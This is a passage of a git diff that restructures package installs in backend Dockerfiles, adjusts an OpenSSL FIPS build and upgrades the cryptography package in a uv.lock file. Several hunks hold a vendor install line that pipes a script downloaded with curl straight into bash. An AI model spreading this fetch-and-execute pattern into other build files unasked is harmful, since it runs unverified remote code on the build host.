libaio symlink for Oracle Instant Client RUN ARCH=$(dpkg --print-architecture) && \ if [ "$ARCH" = "arm64" ]; then \ - apt-get install -y libaio1t64 && \ ln -sf /lib/aarch64-linux-gnu/libaio.so.1t64 /lib/aarch64-linux-gnu/libaio.so.1; \ else \ - apt-get install -y libaio1t64 && \ ln -sf /lib/x86_64-linux-gnu/libaio.so.1t64 /lib/x86_64-linux-gnu/libaio.so.1; \ fi -# Install dependencies for TDS driver (required for SAP ASE dynamic secrets) -RUN apt-get install -y \ - unixodbc \ - unixodbc-dev \ - freetds-dev \ - freetds-bin \ - tdsodbc - RUN printf "[FreeTDS]\nDescription = FreeTDS Driver\nDriver = /usr/lib/x86_64-linux-gnu/odbc/libtdsodbc.so\nSetup = /usr/lib/x86_64-linux-gnu/odbc/libtdsodbc.so\nFileUsage = 1\n" > /etc/odbcinst.ini # Build and install SoftHSM2 @@ -59,9 +60,6 @@ RUN git checkout ${SOFTHSM2_VERSION} -b ${SOFTHSM2_VERSION} \ WORKDIR /root RUN rm -fr ${SOFTHSM2_SOURCES} -# Install pkcs11-tool -RUN apt-get install -y opensc - # Install Oracle Instant Client for OracleDB mTLS (Wallet) support RUN mkdir -p /opt/oracle && \ ARCH=$(dpkg --print-architecture) && \ @@ -92,14 +90,6 @@ RUN wget -q https://github.com/openssl/openssl/releases/download/openssl-3.5.6/o # ? App setup -# Install smbclient for Windows SMB operations -RUN apt-get update && apt-get install -y smbclient - -# Install Infisical CLI -RUN curl -1sLf 'https://artifacts-cli.infisical.com/setup.deb.sh' | bash && \ - apt-get update && \ - apt-get install -y infisical=0.43.14 - WORKDIR /app COPY package.json package.json diff --git a/backend/Dockerfile.dev.fips b/backend/Dockerfile.dev.fips index 911799f17e8..20fd369f017 100644 --- a/backend/Dockerfile.dev.fips +++ b/backend/Dockerfile.dev.fips @@ -7,7 +7,7 @@ ARG SOFTHSM2_VERSION=2.5.0 ENV SOFTHSM2_VERSION=${SOFTHSM2_VERSION} \ SOFTHSM2_SOURCES=/tmp/softhsm2 -# Install build dependencies including python3 (required for pkcs11js and partially TDS driver) +# Install all build and runtime dependencies RUN apt-get update && apt-get install -y \ build-essential \ autoconf \ @@ -23,25 +23,24 @@ RUN apt-get update && apt-get install -y \ pkg-config \ perl \ wget \ - unzip - -# Install libaio (required for Oracle Instant Client) - architecture-specific for Debian Trixie -RUN ARCH=$(dpkg --print-architecture) && \ - if [ "$ARCH" = "arm64" ]; then \ - apt-get install -y libaio1t64 && \ - ln -sf /lib/aarch64-linux-gnu/libaio.so.1t64 /lib/aarch64-linux-gnu/libaio.so.1; \ - else \ - apt-get install -y libaio1t64 && \ - ln -sf /lib/x86_64-linux-gnu/libaio.so.1t64 /lib/x86_64-linux-gnu/libaio.so.1; \ - fi - -# Install dependencies for TDS driver (required for SAP ASE dynamic secrets) -RUN apt-get install -y \ + unzip \ + libaio1t64 \ unixodbc \ unixodbc-dev \ freetds-dev \ freetds-bin \ - tdsodbc + tdsodbc \ + opensc \ + smbclient \ + && curl -1sLf 'https://artifacts-cli.infisical.com/setup.deb.sh' | bash \ + && apt-get update && apt-get install -y infisical=0.43.14 \ + && rm -rf /var/lib/apt/lists/* + +# Create libaio symlink for Oracle Instant Client +RUN ARCH=$(dpkg --print-architecture) && \ + if [ "$ARCH" = "arm64" ]; then \ + ln -sf /lib/aarch64-linux-gnu/libaio.so.1t64 /lib/aarch64-linux-gnu/libaio.so.1; \ + fi RUN printf "[FreeTDS]\nDescription = FreeTDS Driver\nDriver = /usr/lib/x86_64-linux-gnu/odbc/libtdsodbc.so\nSetup = /usr/lib/x86_64-linux-gnu/odbc/libtdsodbc.so\nFileUsage = 1\n" > /etc/odbcinst.ini @@ -58,9 +57,6 @@ RUN git checkout ${SOFTHSM2_VERSION} -b ${SOFTHSM2_VERSION} \ WORKDIR /root RUN rm -fr ${SOFTHSM2_SOURCES} -# Install pkcs11-tool -RUN apt-get install -y opensc - # Install Oracle Instant Client for OracleDB mTLS (Wallet) support RUN mkdir -p /opt/oracle && \ ARCH=$(dpkg --print-architecture) && \ @@ -81,9 +77,10 @@ WORKDIR /openssl-build RUN wget https://www.openssl.org/source/openssl-3.1.2.tar.gz \ && tar -xf openssl-3.1.2.tar.gz \ && cd openssl-3.1.2 \ - && ./Configure enable-fips \ + && ./Configure enable-fips --libdir=lib \ && make \ && make install_fips \ + && test -f /usr/local/lib/ossl-modules/fips.so \ && cd / \ && rm -rf /openssl-build \ && apt-get clean \ @@ -103,14 +100,6 @@ RUN wget -q https://github.com/openssl/openssl/releases/download/openssl-3.5.6/o # ? App setup -# Install smbclient for Windows SMB operations -RUN apt-get update && apt-get install -y smbclient - -# Install Infisical CLI -RUN curl -1sLf 'https://artifacts-cli.infisical.com/setup.deb.sh' | bash && \ - apt-get update && \ - apt-get install -y infisical=0.43.14 - WORKDIR /app COPY package.json package.json diff --git a/backend/bdd/uv.lock b/backend/bdd/uv.lock index 49e1fca7352..67d2303a5fc 100644 --- a/backend/bdd/uv.lock +++ b/backend/bdd/uv.lock @@ -230,58 +230,55 @@ wheels = [ [[package]] name = "cryptography" -version = "46.0.3" +version = "46.0.7" source = { registry = "https://pypi.org/simple" } dependencies = [ { name = "cffi", marker = "platform_python_implementation != 'PyPy'" }, ] -sdist = { url = "https://files.pythonhosted.org/packages/9f/33/c00162f49c0e2fe8064a62cb92b93e50c74a72bc370ab92f86112b33ff62/cryptography-46.0.3.tar.gz", hash = "sha256:a8b17438104fed022ce745b362294d9ce35b4c2e45c1d958ad4a4b019285f4a1", size = 749258, upload-time = "2025-10-15T23:18:31.74Z" } -wheels = [ - { url = "https://files.pythonhosted.org/packages/1d/42/9c391dd801d6cf0d561b5890549d4b27bafcc53b39c31a817e69d87c625b/cryptography-46.0.3-cp311-abi3-macosx_10_9_universal2.whl", hash = "sha256:109d4ddfadf17e8e7779c39f9b18111a09efb969a301a31e987416a0191ed93a", size = 7225004, upload-time = "2025-10-15T23:16:52.239Z" }, - { url = "https://files.pythonhosted.org/packages/1c/67/38769ca6b65f07461eb200e85fc1639b438bdc667be02cf7f2cd6a64601c/cryptography-46.0.3-cp311-abi3-manylinux2014_aarch64.manylinux_2_17_aarch64.whl", hash = "sha256:09859af8466b69bc3c27bdf4f5d84a665e0f7ab5088412e9e2ec49758eca5cbc", size = 4296667, upload-time = "2025-10-15T23:16:54.369Z" }, - { url = "https://files.pythonhosted.org/packages/5c/49/498c86566a1d80e978b42f0d702795f69887005548c041636df6ae1ca64c/cryptography-46.0.3-cp311-abi3-manylinux2014_x86_64.manylinux_2_17_x86_64.whl", hash = "sha256:01ca9ff2885f3acc98c29f1860552e37f6d7c7d013d7334ff2a9de43a449315d", size = 4450807, upload-time = "2025-10-15T23:16:56.414Z" }, - { url = "https://files.pythonhosted.org/packages/4b/0a/863a3604112174c8624a2ac3c038662d9e59970c7f926acdcfaed8d61142/cryptography-46.0.3-cp311-abi3-manylinux_2_28_aarch64.whl", hash = "sha256:6eae65d4c3d33da080cff9c4ab1f711b15c1d9760809dad6ea763f3812d254cb", size = 4299615, upload-time = "2025-10-15T23:16:58.442Z" }, - { url = "https://files.pythonhosted.org/packages/64/02/b73a533f6b64a69f3cd3872acb6ebc12aef924d8d103133bb3ea750dc703/cryptography-46.0.3-cp311-abi3-manylinux_2_28_armv7l.manylinux_2_31_armv7l.whl", hash = "sha256:e5bf0ed4490068a2e72ac03d786693adeb909981cc596425d09032d372bcc849", size = 4016800, upload-time = "2025-10-15T23:17:00.378Z" }, - { url = "https://files.pythonhosted.org/packages/25/d5/16e41afbfa450cde85a3b7ec599bebefaef16b5c6ba4ec49a3532336ed72/cryptography-46.0.3-cp311-abi3-manylinux_2_28_ppc64le.whl", hash = "sha256:5ecfccd2329e37e9b7112a888e76d9feca2347f12f37918facbb893d7bb88ee8", size = 4984707, upload-time = "2025-10-15T23:17:01.98Z" }, - { url = "https://files.pythonhosted.org/packages/c9/56/e7e69b427c3878352c2fb9b450bd0e19ed552753491d39d7d0a2f5226d41/cryptography-46.0.3-cp311-abi3-manylinux_2_28_x86_64.whl", hash = "sha256:a2c0cd47381a3229c403062f764160d57d4d175e022c1df84e168c6251a22eec", size = 4482541, upload-time = "2025-10-15T23:17:04.078Z" }, - { url = "https://files.pythonhosted.org/packages/78/f6/50736d40d97e8483172f1bb6e698895b92a223dba513b0ca6f06b2365339/cryptography-46.0.3-cp311-abi3-manylinux_2_34_aarch64.whl", hash = "sha256:549e234ff32571b1f4076ac269fcce7a808d3bf98b76c8dd560e42dbc66d7d91", size = 4299464, upload-time = "2025-10-15T23:17:05.483Z" }, - { url = "https://files.pythonhosted.org/packages/00/de/d8e26b1a855f19d9994a19c702fa2e93b0456beccbcfe437eda00e0701f2/cryptography-46.0.3-cp311-abi3-manylinux_2_34_ppc64le.whl", hash = "sha256:c0a7bb1a68a5d3471880e264621346c48665b3bf1c3759d682fc0864c540bd9e", size = 4950838, upload-time = "2025-10-15T23:17:07.425Z" }, - { url = "https://files.pythonhosted.org/packages/8f/29/798fc4ec461a1c9e9f735f2fc58741b0daae30688f41b2497dcbc9ed1355/cryptography-46.0.3-cp311-abi3-manylinux_2_34_x86_64.whl", hash = "sha256:10b01676fc208c3e6feeb25a8b83d81767e8059e1fe86e1dc62d10a3018fa926", size = 4481596, upload-time = "2025-10-15T23:17:09.343Z" }, - { url = "https://files.pythonhosted.org/packages/15/8d/03cd48b20a573adfff7652b76271078e3045b9f49387920e7f1f631d125e/cryptography-46.0.3-cp311-abi3-musllinux_1_2_aarch64.whl", hash = "sha256:0abf1ffd6e57c67e92af68330d05760b7b7efb243aab8377e583284dbab72c71", size = 4426782, upload-time = "2025-10-15T23:17:11.22Z" }, - { url = "https://files.pythonhosted.org/packages/fa/b1/ebacbfe53317d55cf33165bda24c86523497a6881f339f9aae5c2e13e57b/cryptography-46.0.3-cp311-abi3-musllinux_1_2_x86_64.whl", hash = "sha256:a04bee9ab6a4da801eb9b51f1b708a1b5b5c9eb48c03f74198464c66f0d344ac", size = 4698381, upload-time = "2025-10-15T23:17:12.829Z" }, - { url = "https://files.pythonhosted.org/packages/96/92/8a6a9525893325fc057a01f654d7efc2c64b9de90413adcf605a85744ff4/cryptography-46.0.3-cp311-abi3-win32.whl", hash = "sha256:f260d0d41e9b4da1ed1e0f1ce571f97fe370b152ab18778e9e8f67d6af432018", size = 3055988, upload-time = "2025-10-15T23:17:14.65Z" }, - { url = "https://files.pythonhosted.org/packages/7e/bf/80fbf45253ea585a1e492a6a17efcb93467701fa79e71550a430c5e60df0/cryptography-46.0.3-cp311-abi3-win_amd64.whl", hash = "sha256:a9a3008438615669153eb86b26b61e09993921ebdd75385ddd748702c5adfddb", size = 3514451, upload-time = "2025-10-15T23:17:16.142Z" }, - { url = "https://files.pythonhosted.org/packages/2e/af/9b302da4c87b0beb9db4e756386a7c6c5b8003cd0e742277888d352ae91d/cryptography-46.0.3-cp311-abi3-win_arm64.whl", hash = "sha256:5d7f93296ee28f68447397bf5198428c9aeeab45705a55d53a6343455dcb2c3c", size = 2928007, upload-time = "2025-10-15T23:17:18.04Z" }, - { url = "https://files.pythonhosted.org/packages/f5/e2/a510aa736755bffa9d2f75029c229111a1d02f8ecd5de03078f4c18d91a3/cryptography-46.0.3-cp314-cp314t-macosx_10_9_universal2.whl", hash = "sha256:00a5e7e87938e5ff9ff5447ab086a5706a957137e6e433841e9d24f38a065217", size = 7158012, upload-time = "2025-10-15T23:17:19.982Z" }, - { url = "https://files.pythonhosted.org/packages/73/dc/9aa866fbdbb95b02e7f9d086f1fccfeebf8953509b87e3f28fff927ff8a0/cryptography-46.0.3-cp314-cp314t-manylinux2014_aarch64.manylinux_2_17_aarch64.whl", hash = "sha256:c8daeb2d2174beb4575b77482320303f3d39b8e81153da4f0fb08eb5fe86a6c5", size = 4288728, upload-time = "2025-10-15T23:17:21.527Z" }, - { url = "https://files.pythonhosted.org/packages/c5/fd/bc1daf8230eaa075184cbbf5f8cd00ba9db4fd32d63fb83da4671b72ed8a/cryptography-46.0.3-cp314-cp314t-manylinux2014_x86_64.manylinux_2_17_x86_64.whl", hash = "sha256:39b6755623145ad5eff1dab323f4eae2a32a77a7abef2c5089a04a3d04366715", size = 4435078, upload-time = "2025-10-15T23:17:23.042Z" }, - { url = "https://files.pythonhosted.org/packages/82/98/d3bd5407ce4c60017f8ff9e63ffee4200ab3e23fe05b765cab805a7db008/cryptography-46.0.3-cp314-cp314t-manylinux_2_28_aarch64.whl", hash = "sha256:db391fa7c66df6762ee3f00c95a89e6d428f4d60e7abc8328f4fe155b5ac6e54", size = 4293460, upload-time = "2025-10-15T23:17:24.885Z" }, - { url = "https://files.pythonhosted.org/packages/26/e9/e23e7900983c2b8af7a08098db406cf989d7f09caea7897e347598d4cd5b/cryptography-46.0.3-cp314-cp314t-manylinux_2_28_armv7l.manylinux_2_31_armv7l.whl", hash = "sha256:78a97cf6a8839a48c49271cdcbd5cf37ca2c1d6b7fdd86cc864f302b5e9bf459", size = 3995237, upload-time = "2025-10-15T23:17:26.449Z" }, - { url = "https://files.pythonhosted.org/packages/91/15/af68c509d4a138cfe299d0d7ddb14afba15233223ebd933b4bbdbc7155d3/cryptography-46.0.3-cp314-cp314t-manylinux_2_28_ppc64le.whl", hash = "sha256:dfb781ff7eaa91a6f7fd41776ec37c5853c795d3b358d4896fdbb5df168af422", size = 4967344, upload-time = "2025-10-15T23:17:28.06Z" }, - { url = "https://files.pythonhosted.org/packages/ca/e3/8643d077c53868b681af077edf6b3cb58288b5423610f21c62aadcbe99f4/cryptography-46.0.3-cp314-cp314t-manylinux_2_28_x86_64.whl", hash = "sha256:6f61efb26e76c45c4a227835ddeae96d83624fb0d29eb5df5b96e14ed1a0afb7", size = 4466564, upload-time = "2025-10-15T23:17:29.665Z" }, - { url = "https://files.pythonhosted.org/packages/0e/43/c1e8726fa59c236ff477ff2b5dc071e54b21e5a1e51aa2cee1676f1c986f/cryptography-46.0.3-cp314-cp314t-manylinux_2_34_aarch64.whl", hash = "sha256:23b1a8f26e43f47ceb6d6a43115f33a5a37d57df4ea0ca295b780ae8546e8044", size = 4292415, upload-time = "2025-10-15T23:17:31.686Z" }, - { url = "https://files.pythonhosted.org/packages/42/f9/2f8fefdb1aee8a8e3256a0568cffc4e6d517b256a2fe97a029b3f1b9fe7e/cryptography-46.0.3-cp314-cp314t-manylinux_2_34_ppc64le.whl", hash = "sha256:b419ae593c86b87014b9be7396b385491ad7f320bde96826d0dd174459e54665", size = 4931457, upload-time = "2025-10-15T23:17:33.478Z" }, - { url = "https://files.pythonhosted.org/packages/79/30/9b54127a9a778ccd6d27c3da7563e9f2d341826075ceab89ae3b41bf5be2/cryptography-46.0.3-cp314-cp314t-manylinux_2_34_x86_64.whl", hash = "sha256:50fc3343ac490c6b08c0cf0d704e881d0d660be923fd3076db3e932007e726e3", size = 4466074, upload-time = "2025-10-15T23:17:35.158Z" }, - { url = "https://files.pythonhosted.org/packages/ac/68/b4f4a10928e26c941b1b6a179143af9f4d27d88fe84a6a3c53592d2e76bf/cryptography-46.0.3-cp314-cp314t-musllinux_1_2_aarch64.whl", hash = "sha256:22d7e97932f511d6b0b04f2bfd818d73dcd5928db509460aaf48384778eb6d20", size = 4420569, upload-time = "2025-10-15T23:17:37.188Z" }, - { url = "https://files.pythonhosted.org/packages/a3/49/3746dab4c0d1979888f125226357d3262a6dd40e114ac29e3d2abdf1ec55/cryptography-46.0.3-cp314-cp314t-musllinux_1_2_x86_64.whl", hash = "sha256:d55f3dffadd674514ad19451161118fd010988540cee43d8bc20675e775925de", size = 4681941, upload-time = "2025-10-15T23:17:39.236Z" }, - { url = "https://files.pythonhosted.org/packages/fd/30/27654c1dbaf7e4a3531fa1fc77986d04aefa4d6d78259a62c9dc13d7ad36/cryptography-46.0.3-cp314-cp314t-win32.whl", hash = "sha256:8a6e050cb6164d3f830453754094c086ff2d0b2f3a897a1d9820f6139a1f0914", size = 3022339, upload-time = "2025-10-15T23:17:40.888Z" }, - { url = "https://files.pythonhosted.org/packages/f6/30/640f34ccd4d2a1bc88367b54b926b781b5a018d65f404d409aba76a84b1c/cryptography-46.0.3-cp314-cp314t-win_amd64.whl", hash = "sha256:760f83faa07f8b64e9c33fc963d790a2edb24efb479e3520c14a45741cd9b2db", size = 3494315, upload-time = "2025-10-15T23:17:42.769Z" }, - { url = "https://files.pythonhosted.org/packages/ba/8b/88cc7e3bd0a8e7b861f26981f7b820e1f46aa9d26cc482d0feba0ecb4919/cryptography-46.0.3-cp314-cp314t-win_arm64.whl", hash = "sha256:516ea134e703e9fe26bcd1277a4b59ad30586ea90c365a87781d7887a646fe21", size = 2919331, upload-time = "2025-10-15T23:17:44.468Z" }, - { url = "https://files.pythonhosted.org/packages/fd/23/45fe7f376a7df8daf6da3556603b36f53475a99ce4faacb6ba2cf3d82021/cryptography-46.0.3-cp38-abi3-macosx_10_9_universal2.whl", hash = "sha256:cb3d760a6117f621261d662bccc8ef5bc32ca673e037c83fbe565324f5c46936", size = 7218248, upload-time = "2025-10-15T23:17:46.294Z" }, - { url = "https://files.pythonhosted.org/packages/27/32/b68d27471372737054cbd34c84981f9edbc24fe67ca225d389799614e27f/cryptography-46.0.3-cp38-abi3-manylinux2014_aarch64.manylinux_2_17_aarch64.whl", hash = "sha256:4b7387121ac7d15e550f5cb4a43aef2559ed759c35df7336c402bb8275ac9683", size = 4294089, upload-time = "2025-10-15T23:17:48.269Z" }, - { url = "https://files.pythonhosted.org/packages/26/42/fa8389d4478368743e24e61eea78846a0006caffaf72ea24a15159215a14/cryptography-46.0.3-cp38-abi3-manylinux2014_x86_64.manylinux_2_17_x86_64.whl", hash = "sha256:15ab9b093e8f09daab0f2159bb7e47532596075139dd74365da52ecc9cb46c5d", size = 4440029, upload-time = "2025-10-15T23:17:49.837Z" }, - { url = "https://files.pythonhosted.org/packages/5f/eb/f483db0ec5ac040824f269e93dd2bd8a21ecd1027e77ad7bdf6914f2fd80/cryptography-46.0.3-cp38-abi3-manylinux_2_28_aarch64.whl", hash = "sha256:46acf53b40ea38f9c6c229599a4a13f0d46a6c3fa9ef19fc1a124d62e338dfa0", size = 4297222, upload-time = "2025-10-15T23:17:51.357Z" }, - { url = "https://files.pythonhosted.org/packages/fd/cf/da9502c4e1912cb1da3807ea3618a6829bee8207456fbbeebc361ec38ba3/cryptography-46.0.3-cp38-abi3-manylinux_2_28_armv7l.manylinux_2_31_armv7l.whl", hash = "sha256:10ca84c4668d066a9878890047f03546f3ae0a6b8b39b697457b7757aaf18dbc", size = 4012280, upload-time = "2025-10-15T23:17:52.964Z" }, - { url = "https://files.pythonhosted.org/packages/6b/8f/9adb86b93330e0df8b3dcf03eae67c33ba89958fc2e03862ef1ac2b42465/cryptography-46.0.3-cp38-abi3-manylinux_2_28_ppc64le.whl", hash = "sha256:36e627112085bb3b81b19fed209c05ce2a52ee8b15d161b7c643a7d5a88491f3", size = 4978958, upload-time = "2025-10-15T23:17:54.965Z" }, - { url = "https://files.pythonhosted.org/packages/d1/a0/5fa77988289c34bdb9f913f5606ecc9ada1adb5ae870bd0d1054a7021cc4/cryptography-46.0.3-cp38-abi3-manylinux_2_28_x86_64.whl", hash = "sha256:1000713389b75c449a6e979ffc7dcc8ac90b437048766cef052d4d30b8220971", size = 4473714, upload-time = "2025-10-15T23:17:56.754Z" }, - { url = "https://files.pythonhosted.org/packages/14/e5/fc82d72a58d41c393697aa18c9abe5ae1214ff6f2a5c18ac470f92777895/cryptography-46.0.3-cp38-abi3-manylinux_2_34_aarch64.whl", hash = "sha256:b02cf04496f6576afffef5ddd04a0cb7d49cf6be16a9059d793a30b035f6b6ac", size = 4296970, upload-time = "2025-10-15T23:17:58.588Z" }, - { url = "https://files.pythonhosted.org/packages/78/06/5663ed35438d0b09056973994f1aec467492b33bd31da36e468b01ec1097/cryptography-46.0.3-cp38-abi3-manylinux_2_34_ppc64le.whl", hash = "sha256:71e842ec9bc7abf543b47cf86b9a743baa95f4677d22baa4c7d5c69e49e9bc04", size = 4940236, upload-time = "2025-10-15T23:18:00.897Z" }, - { url = "https://files.pythonhosted.org/packages/fc/59/873633f3f2dcd8a053b8dd1d38f783043b5fce589c0f6988bf55ef57e43e/cryptography-46.0.3-cp38-abi3-manylinux_2_34_x86_64.whl", hash = "sha256:402b58fc32614f00980b66d6e56a5b4118e6cb362ae8f3fda141ba4689bd4506", size = 4472642, upload-time = "2025-10-15T23:18:02.749Z" }, - { url = "https://files.pythonhosted.org/packages/3d/39/8e71f3930e40f6877737d6f69248cf74d4e34b886a3967d32f919cc50d3b/cryptography-46.0.3-cp38-abi3-musllinux_1_2_aarch64.whl", hash = "sha256:ef639cb3372f69ec44915fafcd6698b6cc78fbe0c2ea41be867f6ed612811963", size = 4423126, upload-time = "2025-10-15T23:18:04.85Z" }, - { url = "https://files.pythonhosted.org/packages/cd/c7/f65027c2810e14c3e7268353b1681932b87e5a48e65505d8cc17c99e36ae/cryptography-46.0.3-cp38-abi3-musllinux_1_2_x86_64.whl", hash = "sha256:3b51b8ca4f1c6453d8829e1eb7299499ca7f313900dd4d89a24b8b87c0a780d4", size = 4686573, upload-time = "2025-10-15T23:18:06.908Z" }, - { url = "https://files.pythonhosted.org/packages/0a/6e/1c8331ddf91ca4730ab3086a0f1be19c65510a33b5a441cb334e7a2d2560/cryptography-46.0.3-cp38-abi3-win32.whl", hash = "sha256:6276eb85ef938dc035d59b87c8a7dc559a232f954962520137529d77b18ff1df", size = 3036695, upload-time = "2025-10-15T23:18:08.672Z" }, - { url = "https://files.pythonhosted.org/packages/90/45/b0d691df20633eff80955a0fc7695ff9051ffce8b69741444bd9ed7bd0db/cryptography-46.0.3-cp38-abi3-win_amd64.whl", hash = "sha256:416260257577718c05135c55958b674000baef9a1c7d9e8f306ec60d71db850f", size = 3501720, upload-time = "2025-10-15T23:18:10.632Z" }, - { url = "https://files.pythonhosted.org/packages/e8/cb/2da4cc83f5edb9c3257d09e1e7ab7b23f049c7962cae8d842bbef0a9cec9/cryptography-46.0.3-cp38-abi3-win_arm64.whl", hash = "sha256:d89c3468de4cdc4f08a57e214384d0471911a3830fcdaf7a8cc587e42a866372", size = 2918740, upload-time = "2025-10-15T23:18:12.277Z" }, +sdist = { url = "https://files.pythonhosted.org/packages/47/93/ac8f3d5ff04d54bc814e961a43ae5b0b146154c89c61b47bb07557679b18/cryptography-46.0.7.tar.gz", hash = "sha256:e4cfd68c5f3e0bfdad0d38e023239b96a2fe84146481852dffbcca442c245aa5", size = 750652, upload-time = "2026-04-08T01:57:54.692Z" } +wheels = [ + { url = "https://files.pythonhosted.org/packages/0b/5d/4a8f770695d73be252331e60e526291e3df0c9b27556a90a6b47bccca4c2/cryptography-46.0.7-cp311-abi3-macosx_10_9_universal2.whl", hash = "sha256:ea42cbe97209df307fdc3b155f1b6fa2577c0defa8f1f7d3be7d31d189108ad4", size = 7179869, upload-time = "2026-04-08T01:56:17.157Z" }, + { url = "https://files.pythonhosted.org/packages/5f/45/6d80dc379b0bbc1f9d1e429f42e4cb9e1d319c7a8201beffd967c516ea01/cryptography-46.0.7-cp311-abi3-manylinux2014_aarch64.manylinux_2_17_aarch64.whl", hash = "sha256:b36a4695e29fe69215d75960b22577197aca3f7a25b9cf9d165dcfe9d80bc325", size = 4275492, upload-time = "2026-04-08T01:56:19.36Z" }, + { url = "https://files.pythonhosted.org/packages/4a/9a/1765afe9f572e239c3469f2cb429f3ba7b31878c893b246b4b2994ffe2fe/cryptography-46.0.7-cp311-abi3-manylinux2014_x86_64.manylinux_2_17_x86_64.whl", hash = "sha256:5ad9ef796328c5e3c4ceed237a183f5d41d21150f972455a9d926593a1dcb308", size = 4426670, upload-time = "2026-04-08T01:56:21.415Z" }, + { url = "https://files.pythonhosted.org/packages/8f/3e/af9246aaf23cd4ee060699adab1e47ced3f5f7e7a8ffdd339f817b446462/cryptography-46.0.7-cp311-abi3-manylinux_2_28_aarch64.whl", hash = "sha256:73510b83623e080a2c35c62c15298096e2a5dc8d51c3b4e1740211839d0dea77", size = 4280275, upload-time = "2026-04-08T01:56:23.539Z" }, + { url = "https://files.pythonhosted.org/packages/0f/54/6bbbfc5efe86f9d71041827b793c24811a017c6ac0fd12883e4caa86b8ed/cryptography-46.0.7-cp311-abi3-manylinux_2_28_ppc64le.whl", hash = "sha256:cbd5fb06b62bd0721e1170273d3f4d5a277044c47ca27ee257025146c34cbdd1", size = 4928402, upload-time = "2026-04-08T01:56:25.624Z" }, + { url = "https://files.pythonhosted.org/packages/2d/cf/054b9d8220f81509939599c8bdbc0c408dbd2bdd41688616a20731371fe0/cryptography-46.0.7-cp311-abi3-manylinux_2_28_x86_64.whl", hash = "sha256:420b1e4109cc95f0e5700eed79908cef9268265c773d3a66f7af1eef53d409ef", size = 4459985, upload-time = "2026-04-08T01:56:27.309Z" }, + { url = "https://files.pythonhosted.org/packages/f9/46/4e4e9c6040fb01c7467d47217d2f882daddeb8828f7df800cb806d8a2288/cryptography-46.0.7-cp311-abi3-manylinux_2_31_armv7l.whl", hash = "sha256:24402210aa54baae71d99441d15bb5a1919c195398a87b563df84468160a65de", size = 3990652, upload-time = "2026-04-08T01:56:29.095Z" }, + { url = "https://files.pythonhosted.org/packages/36/5f/313586c3be5a2fbe87e4c9a254207b860155a8e1f3cca99f9910008e7d08/cryptography-46.0.7-cp311-abi3-manylinux_2_34_aarch64.whl", hash = "sha256:8a469028a86f12eb7d2fe97162d0634026d92a21f3ae0ac87ed1c4a447886c83", size = 4279805, upload-time = "2026-04-08T01:56:30.928Z" }, + { url = "https://files.pythonhosted.org/packages/69/33/60dfc4595f334a2082749673386a4d05e4f0cf4df8248e63b2c3437585f2/cryptography-46.0.7-cp311-abi3-manylinux_2_34_ppc64le.whl", hash = "sha256:9694078c5d44c157ef3162e3bf3946510b857df5a3955458381d1c7cfc143ddb", size = 4892883, upload-time = "2026-04-08T01:56:32.614Z" }, + { url = "https://files.pythonhosted.org/packages/c7/0b/333ddab4270c4f5b972f980adef4faa66951a4aaf646ca067af597f15563/cryptography-46.0.7-cp311-abi3-manylinux_2_34_x86_64.whl", hash = "sha256:42a1e5f98abb6391717978baf9f90dc28a743b7d9be7f0751a6f56a75d14065b", size = 4459756, upload-time = "2026-04-08T01:56:34.306Z" }, + { url = "https://files.pythonhosted.org/packages/d2/14/633913398b43b75f1234834170947957c6b623d1701ffc7a9600da907e89/cryptography-46.0.7-cp311-abi3-musllinux_1_2_aarch64.whl", hash = "sha256:91bbcb08347344f810cbe49065914fe048949648f6bd5c2519f34619142bbe85", size = 4410244, upload-time = "2026-04-08T01:56:35.977Z" }, + { url = "https://files.pythonhosted.org/packages/10/f2/19ceb3b3dc14009373432af0c13f46aa08e3ce334ec6eff13492e1812ccd/cryptography-46.0.7-cp311-abi3-musllinux_1_2_x86_64.whl", hash = "sha256:5d1c02a14ceb9148cc7816249f64f623fbfee39e8c03b3650d842ad3f34d637e", size = 4674868, upload-time = "2026-04-08T01:56:38.034Z" }, + { url = "https://files.pythonhosted.org/packages/1a/bb/a5c213c19ee94b15dfccc48f363738633a493812687f5567addbcbba9f6f/cryptography-46.0.7-cp311-abi3-win32.whl", hash = "sha256:d23c8ca48e44ee015cd0a54aeccdf9f09004eba9fc96f38c911011d9ff1bd457", size = 3026504, upload-time = "2026-04-08T01:56:39.666Z" }, + { url = "https://files.pythonhosted.org/packages/2b/02/7788f9fefa1d060ca68717c3901ae7fffa21ee087a90b7f23c7a603c32ae/cryptography-46.0.7-cp311-abi3-win_amd64.whl", hash = "sha256:397655da831414d165029da9bc483bed2fe0e75dde6a1523ec2fe63f3c46046b", size = 3488363, upload-time = "2026-04-08T01:56:41.893Z" }, + { url = "https://files.pythonhosted.org/packages/7b/56/15619b210e689c5403bb0540e4cb7dbf11a6bf42e483b7644e471a2812b3/cryptography-46.0.7-cp314-cp314t-macosx_10_9_universal2.whl", hash = "sha256:d151173275e1728cf7839aaa80c34fe550c04ddb27b34f48c232193df8db5842", size = 7119671, upload-time = "2026-04-08T01:56:44Z" }, + { url = "https://files.pythonhosted.org/packages/74/66/e3ce040721b0b5599e175ba91ab08884c75928fbeb74597dd10ef13505d2/cryptography-46.0.7-cp314-cp314t-manylinux2014_aarch64.manylinux_2_17_aarch64.whl", hash = "sha256:db0f493b9181c7820c8134437eb8b0b4792085d37dbb24da050476ccb664e59c", size = 4268551, upload-time = "2026-04-08T01:56:46.071Z" }, + { url = "https://files.pythonhosted.org/packages/03/11/5e395f961d6868269835dee1bafec6a1ac176505a167f68b7d8818431068/cryptography-46.0.7-cp314-cp314t-manylinux2014_x86_64.manylinux_2_17_x86_64.whl", hash = "sha256:ebd6daf519b9f189f85c479427bbd6e9c9037862cf8fe89ee35503bd209ed902", size = 4408887, upload-time = "2026-04-08T01:56:47.718Z" }, + { url = "https://files.pythonhosted.org/packages/40/53/8ed1cf4c3b9c8e611e7122fb56f1c32d09e1fff0f1d77e78d9ff7c82653e/cryptography-46.0.7-cp314-cp314t-manylinux_2_28_aarch64.whl", hash = "sha256:b7b412817be92117ec5ed95f880defe9cf18a832e8cafacf0a22337dc1981b4d", size = 4271354, upload-time = "2026-04-08T01:56:49.312Z" }, + { url = "https://files.pythonhosted.org/packages/50/46/cf71e26025c2e767c5609162c866a78e8a2915bbcfa408b7ca495c6140c4/cryptography-46.0.7-cp314-cp314t-manylinux_2_28_ppc64le.whl", hash = "sha256:fbfd0e5f273877695cb93baf14b185f4878128b250cc9f8e617ea0c025dfb022", size = 4905845, upload-time = "2026-04-08T01:56:50.916Z" }, + { url = 